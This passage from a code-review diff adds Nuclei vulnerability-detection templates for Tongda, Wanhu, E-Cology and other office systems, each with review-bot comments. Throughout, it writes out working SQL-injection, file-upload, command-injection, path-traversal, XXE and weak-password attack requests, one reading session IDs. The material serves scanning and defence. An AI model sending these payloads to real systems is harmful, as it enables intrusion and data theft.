- 'status_code_2 == 200 && !contains(body_2,"<title>用户未登录</title>") && contains(body_2,"loginUser")'
condition: and
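Review bot: the `cookie` extractor regex `PHPSESSID=(.*?);` requires a `;` after the value, so it captures nothing when `Set-Cookie` carries `PHPSESSID=...` as the last or only attribute, and request 2 is then sent with an empty session; `PHPSESSID=([^;]+)` is the safe form. The first DSL line only verifies that a `PHPSESSID` cookie was set, which any PHP page does; the real evidence is the `loginUser` check on request 2, so the description should say the template verifies a session forged via `header.inc.php` by loading `/general/index.php`.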

View File

@ -0,0 +1,33 @@
id: tongda-oa-insert-sqli
info:
name: tongda-oa-insert-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.6 insert参数包含SQL注入漏洞攻击者通过漏洞可获取数据库敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20insert%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "PHPSESSID="
- type: status
status:
- 302
#exp title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
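Review bot: the matchers (`PHPSESSID=` in the header plus a `302`) can also be produced by a patched build that simply redirects an unauthenticated POST to `/general/document/index.php/recv/register/insert`, and the boolean-blind probe `exp(if(...,1,710))` has no check of the negative branch; document what the overflow case returns and match on the difference, otherwise this is a high-false-positive template. The trailing `#exp` comment carries a payload that reads `SID` from `user_online` (live session identifiers); a detection template should not ship that, remove the line.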

View File

@ -0,0 +1,52 @@
id: tongda-oa-login-code-arbitrary-login
info:
name: tongda-oa-login-code-arbitrary-login
author: SleepingBag945
severity: high
description: 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录.登录之后可进一步上传恶意文件控制网站服务器。
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20login_code.php%20任意用户登录.html
tags: tongda,oa
http:
- raw:
- |
GET /general/login_code.php HTTP/1.1
Host: {{Hostname}}
- |
POST /logincheck_code.php HTTP/1.1
Host: {{Hostname}}
CODEUID={{uid}}&UID=1
- |
GET /general/index.php?isIE=0&modify_pwd=0 HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{cookie}};
extractors:
- type: regex
name: uid
internal: true
group: 1
regex:
- '"code_uid":"(.*?)"'
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "\"code_uid\":\"{") && contains(body_1,"\"status\":1")'
- 'status_code_2 == 200 && contains(body_2,"index.php?isIE")'
- 'status_code_2 == 200 && contains(header_2,"Set-Cookie")'
- 'status_code_3 == 200 && !contains(body_3,"<title>用户未登录</title>") && contains(body_3,"loginUser")'
condition: and
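Review bot: the two `status_code_2` DSL lines can be a single expression, and the `cookie` extractor's `PHPSESSID=(.*?);` has the same trailing-`;` dependency as in the `header-inc` template (use `[^;]+`). The `uid` extractor declares no `part`, so it scans headers and bodies of all three responses; scoping it to `part: body` prevents a stray `code_uid` elsewhere from overriding the value. The description's patch date is useful context; keep it but translate to English.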

View File

@ -0,0 +1,37 @@
id: tongda-oa-meeting-unauth
info:
name: tongda-oa-meeting-unauth
author: SleepingBag945
severity: medium
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: */*
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: word
words:
- "creator"
- type: word
words:
- "originalTitle"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
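Review bot: `description` and `reference` are wrong for this file: both describe the `getway.php` file-inclusion issue, whereas the request here is an unauthenticated `GET /general/calendar/arrange/get_cal_list.php` returning calendar entries (`creator`, `originalTitle`, JSON content type). Replace them with a description of the actual unauthenticated calendar-data exposure and the correct advisory link; as merged, anyone triaging a hit is sent to the wrong issue.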

View File

@ -0,0 +1,28 @@
id: tongda-oa-report-bi-func-sqli
info:
name: tongda-oa-report-bi-func-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.6 report_bi.func.php 存在SQL注入漏洞攻击者通过漏洞可以获取数据库信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20report_bi.func.php%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
matchers-condition: and
matchers:
- type: word
words:
- "root@"
- type: status
status:
- 200
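Review bot: the sole content matcher `root@` assumes the injected `user()` returns a root account; on a deployment that runs the OA database under a least-privilege account the template stays silent even though the injection executes. Match on output the payload itself controls (the `database()` column or a constant) rather than on the privilege level, and treat `root@` in the response as a separate finding worth its own sentence in the description, which should be English.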

View File

@ -0,0 +1,50 @@
id: tongda-oa-swfupload-sqli
info:
name: tongda-oa-swfupload-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞攻击者通过漏洞可获取服务器敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/file_folder/swfupload_new.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
------------GFioQpMK0vv2--
matchers-condition: and
matchers:
- type: word
words:
- "不安全的SQL语句"
- type: status
status:
- 200
#Content-Disposition: form-data; name="SORT_ID"
#0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
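Review bot: the multipart body sends an empty `SORT_ID` part, and the matcher looks for `不安全的SQL语句` ("unsafe SQL statement"), which is the application's own filter message, so the template fingerprints a build that emits that message; it does not show an injected statement executing. Say so in the description, and delete the two commented-out lines after the matchers (`#Content-Disposition: form-data; name="SORT_ID"` and the `#0 RLIKE ...` payload), which the template does not use.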

View File

@ -0,0 +1,35 @@
id: tongda-oa-v2014-get-contactlist-info-leak
info:
name: tongda-oa-v2014-get-contactlist-info-leak
author: SleepingBag945
severity: medium
description: 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞攻击者通过漏洞可以获取敏感信息进一步攻击
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "user_uid"
- type: word
words:
- "user_name"
- type: word
words:
- "user_id"
- type: word
words:
- "priv_name"
- type: status
status:
- 200
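Review bot: the probe `get_contactlist.php?P=1&KWORD=%25&isuser_info=3` uses a wildcard keyword and so returns the contact directory, which is personal data; note in the description that a hit means the directory is readable without authentication, and add `metadata: max-request: 1` as the ecology template in this change does. The four separate `- type: word` blocks can be one block with `condition: and`, which is equivalent under `matchers-condition: and`.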

View File

@ -0,0 +1,61 @@
id: tongda-oa-v2017-action-upload-arbitrary-file-upload
info:
name: tongda-oa-v2017-action-upload-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
{{randstr_1}}
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php echo md5(40167);unlink(__FILE__);?>
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
submit
------WebKitFormBoundaryjhddzlqp--
- raw:
- |
GET {{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "1f18933ca1e531c1eac9cccc4952a03b"
- type: status
status:
- 200
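Review bot: `reference` points to the `video_file.php` arbitrary-download advisory, not to the `action_upload.php` upload issue this template probes, and `tags: tongda,oa,info` labels a critical file-upload as informational. The follow-up `GET {{randstr_1}}.php` has no leading `/` and no directory, so it is unclear where the uploaded file is expected to be served from; document the storage path that `CONFIG[filePathFormat]` maps to. Note also that the first `- raw:` block carries no matchers, so only the second block's `matchers-condition` decides the result. The uploaded proof removes itself (`unlink(__FILE__)`), which is the right pattern and is missing from the api.ali template.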

View File

@ -0,0 +1,29 @@
id: tongda-oa-v2017-video-file-arbitrary-file-read
info:
name: tongda-oa-v2017-video-file-arbitrary-file-read
author: SleepingBag945
severity: medium
description: 通达OA v2017 video_file.php文件存在任意文件下载漏洞攻击者通过漏洞可以读取服务器敏感文件
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "$ROOT_PATH"
- type: word
words:
- "$ATTACH_PATH"
- type: status
status:
- 200
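Review bot: the probe reads `inc/oa_config.php`, the deployment's configuration file, and the matchers `$ROOT_PATH` / `$ATTACH_PATH` are generic constant names. A less sensitive file with a distinctive marker would demonstrate the same traversal while keeping configuration secrets out of scan logs; at minimum, state in the description that scan output may contain secrets from this file. The description should be English.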

View File

@ -0,0 +1,36 @@
id: topsec-topacm-rce
info:
name: topsec topacm remote code execution
author: SleepingBag945
severity: critical
description: 天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java
- https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md
tags: rce,topsec,topacm
http:
- raw:
- |
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- raw:
- |
GET /config_application.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "{{randstr}}"
- type: status
status:
- 200
# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top"
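Review bot: the probe writes `/var/www/html/config_application.txt` on the target (`|| echo '{{randstr}}' > ...`) and nothing removes it, so every scan leaves a world-readable file in the web root; document this side effect in the description or choose a non-persistent proof. The trailing comment `# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top"` is a fingerprint query and belongs under `metadata: fofa-query`, as other templates in this change do.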

View File

@ -0,0 +1,33 @@
id: topsec-topapplb-arbitrary-user-login
info:
name: Topsec TopAppLB Any account Login
author: SleepingBag945
severity: critical
description: |
Any Account can log in to the background
tags: defaultaccount
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
userName=admin&password=%3Bid
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
condition: and
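Review bot: the request sends `password=%3Bid` (`;id`), which is a command-injection probe, yet the name (`Any account Login`), description and `tags: defaultaccount` describe an authentication bypass, and the matcher only checks for a `302` to `redirect.php`. Decide which issue this template covers and make name, tags and description agree; a `reference` is also missing.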

View File

@ -0,0 +1,30 @@
id: wanhu-oa-documentedit-sqli
info:
name: wanhu-oa-documentedit-sqli
author: SleepingBag945
severity: high
description: 万户Ezoffice系统是一套基于jsp的oa系统该系统基于J2EE架构技术的三层架构完全采用B/S体系结构广泛应用于各个行业。 万户ezOFFICE协同办公系统DocumentEdit.jsp存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html
tags: wanhu,oa,sqli
http:
- raw:
- |
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27caqopg%27||%27povurh%27,null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "HTTP-EQUIV=\"Pragma\""
- type: word
words:
- "caqopgpovurh"
- type: status
status:
- 200
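Review bot: the first word matcher `HTTP-EQUIV=\"Pragma\"` is a generic HTML meta tag and adds no evidence; the concatenated marker `caqopgpovurh` (from `'caqopg'||'povurh'`) is the real signal. The payload uses `||` and `from dual`, so it only works against Oracle-backed installs; state that in the description (which should also be English) so a negative result on another database is not read as "not vulnerable".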

View File

@ -0,0 +1,29 @@
id: wanhu-oa-download-ftp-arbitrary-file-read
info:
name: wanhu-oa-download-ftp-arbitrary-file-read
author: SleepingBag945
severity: high
description: 万户OA download_ftp.jsp文件存在任意文件下载漏洞攻击者通过漏洞可以下载服务器上的任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version="
- type: word
words:
- "DOCTYPE"
- type: status
status:
- 200
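Review bot: matchers `<?xml version=` and `DOCTYPE` are both satisfied by many XML/XHTML responses, not only by the requested `WEB-INF/web.xml`; match on something specific to a deployment descriptor (the `<web-app` element) so a generic error document does not register as a successful read. The description should be English.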

View File

@ -0,0 +1,29 @@
id: wanhu-oa-download-old-arbitrary-file-read
info:
name: wanhu-oa-download-old-arbitrary-file-read
author: SleepingBag945
severity: high
description: 万户OA download_old.jsp文件存在任意文件下载漏洞攻击者通过漏洞可以下载服务器上的任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version="
- type: word
words:
- "DOCTYPE"
- type: status
status:
- 200
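Review bot: this is the `download_ftp.jsp` template with a different path and parameter layout, the same matchers and the same weakness (`<?xml version=` plus `DOCTYPE` is not specific to `web.xml`). Since the matcher logic is identical, consider one template with both requests and `stop-at-first-match: true`, and tighten the matcher to a `web.xml`-specific element in both.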

View File

@ -0,0 +1,48 @@
id: wanhu-oa-fileupload-controller-arbitrary-file-upload
info:
name: wanhu-oa-fileupload-controller-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20fileUpload.controller%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="indh.jsp"
Content-Type: application/octet-stream
<%out.print(42285 * 41559);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
- |
GET /defaultroot/upload/html/{(unknown)} HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: filename
internal: true
group: 1
regex:
- '"data":"(.*?)"'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
- 'status_code_2 == 200 && contains(body_2,"1757322315")'
condition: and
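Review bot: the second request path reads `/defaultroot/upload/html/{(unknown)}`, so the `filename` extractor (`\"data\":\"(.*?)\"`) is never consumed; this should be `{{filename}}`. The hardcoded `Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6` is a session id from the author's environment: if the endpoint is truly unauthenticated the header should be dropped, and if it is required the template is not reproducible. The JSP proof (`42285 * 41559`, matched as `1757322315`) deletes itself, which is the right pattern.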

View File

@ -0,0 +1,27 @@
id: wanhu-oa-officeserverservlet-arbitrary-file-upload
info:
name: wanhu-oa-officeserverservlet-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA officeserverservlet 文件上传漏洞
reference:
- https://github.com/onMey/WH/blob/main/poc.py
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20OfficeServer.jsp%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/officeserverservlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "DBSTEP V3.0"
- type: status
status:
- 200
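Review bot: a plain `GET /defaultroot/officeserverservlet` matching `DBSTEP V3.0` confirms the servlet is present, not that it accepts uploads, yet the id and `severity: critical` describe an arbitrary file upload. Say in the description that this is an exposure check for the OfficeServer endpoint so hits are triaged as "reachable, verify manually" rather than confirmed upload; the description is also Chinese-only.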

View File

@ -0,0 +1,29 @@
id: wanhu-oa-smartupload-arbitrary-file-upload
info:
name: wanhu-oa-smartupload-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 万户OA smartUpload.jsp文件存在文件上传接口且没有对文件类型进行过滤,导致任意文件上传漏洞。可直接上传恶意JSP文件。
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20smartUpload.jsp%20任意文件上传漏洞.html
tags: wanhu,oa
http:
- raw:
- |
GET /defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "请选择要上传的文件"
- type: word
words:
- "<TITLE>上传附件</TITLE>"
- type: status
status:
- 200
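Review bot: the request only loads the `smartUpload.jsp` form with `fileType=gif,jpg,bmp,jsp,png` and matches the page's own strings (`请选择要上传的文件`, `<TITLE>上传附件</TITLE>`), i.e. it shows the upload page renders for an unauthenticated client, not that a `.jsp` is accepted; `severity: critical` and the name should reflect that, as with the officeserverservlet template.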

View File

@ -0,0 +1,28 @@
id: wanhu-oa-teleconferenceservice-xxe-inject
info:
name: wanhu-oa-teleconferenceservice-xxe-inject
author: SleepingBag945
severity: medium
description: 万户OA TeleConferenceService接口存在XXE注入漏洞攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html
tags: wanhu,oa,xxe
http:
- raw:
- |
POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<value>&xxe;</value>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
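Review bot: `matchers-condition: and` over a single matcher is redundant; drop it or keep it consistent with the other interactsh template in this change. The description (Chinese) should be English, and since the probe only resolves `{{interactsh-url}}` via DNS, it should make clear that a hit proves the parser fetches an external entity, not that file content is returned.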

View File

@ -0,0 +1,47 @@
id: wayos-ac-weak-login
info:
name: wayos-ac weak password
author: SleepingBag945
severity: high
description: wayos weak login credentials were discovered.
reference:
- https://github.com/Ershu1/2021_Hvv/blob/main/
tags: ways-ac
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=admin&password={{ password }}&Submit=%E7%99%BB%E5%BD%95
attack: pitchfork
payloads:
password:
- admin
- 123456
- 12345678
- password
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "ac_userid=admin,ac_passwd"
condition: and
- type: word
part: body
words:
- "window.open"
- "text/javascript"
condition: and
- type: status
status:
- 200
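Review bot: `tags: ways-ac` is a typo for `wayos-ac`, and the `reference` `https://github.com/Ershu1/2021_Hvv/blob/main/` points at a repository root rather than a document. The header matcher `ac_userid=admin,ac_passwd` implies the device echoes the credential pair back in a cookie; that deserves a sentence in the description. `attack: pitchfork` over a single payload list behaves like `batteringram`; state which was intended.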

View File

@ -0,0 +1,41 @@
id: CNVD-2023-12632
info:
name: E-Cology V9 - SQL Injection
author: daffainfo
severity: high
description: |
Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
reference:
- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
- https://blog.csdn.net/qq_50854662/article/details/129992329
metadata:
max-request: 1
verified: "true"
fofa-query: app="泛微-协同商务系统"
shodan-query: 'ecology_JSessionid'
tags: cnvd,cnvd2023,ecology,sqli
# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times
http:
- raw:
- |
GET /mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%3
3%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'browserUrl'
- '"autoCount"'
- '"autoGet"'
condition: and
- type: status
status:
- 200
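Review bot: the matchers (`browserUrl`, `"autoCount"`, `"autoGet"`) are structural keys of the `browser.jsp` response and will be present whether or not the injected expression executed, so a patched build returning the same JSON shape is reported; match on the digest the payload produces (the template's own comment states it is `md5(9999999)`). Also `verified: "true"` is a quoted string while `verified: true` (boolean) is used elsewhere in this change; keep one form.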

View File

@ -0,0 +1,24 @@
id: ecology-oa-byxml-xxe
info:
name: EcologyOA deleteUserRequestInfoByXml - XXE
author: unknown
severity: high
description: EcologyOA deleteUserRequestInfoByXml interface has XXE
tags: ecology-oa,xxe
http:
- raw:
- |
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0"?>
<!DOCTYPE>
matchers:
- type: word
words:
- 'WfData'
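Review bot: the body is `<?xml version="1.0"?>` followed by an empty `<!DOCTYPE>` with no entity declaration, so the request is an XML-parse probe of `/rest/ofs/deleteUserRequestInfoByXml`, not an XXE test, while the name and `severity: high` claim XXE. Either describe it as an endpoint check or use an out-of-band entity with an interactsh matcher as the TeleConferenceService template in this change does. `author: unknown` and the missing `reference` should be filled before merge.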

View File

@ -0,0 +1,25 @@
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
http:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
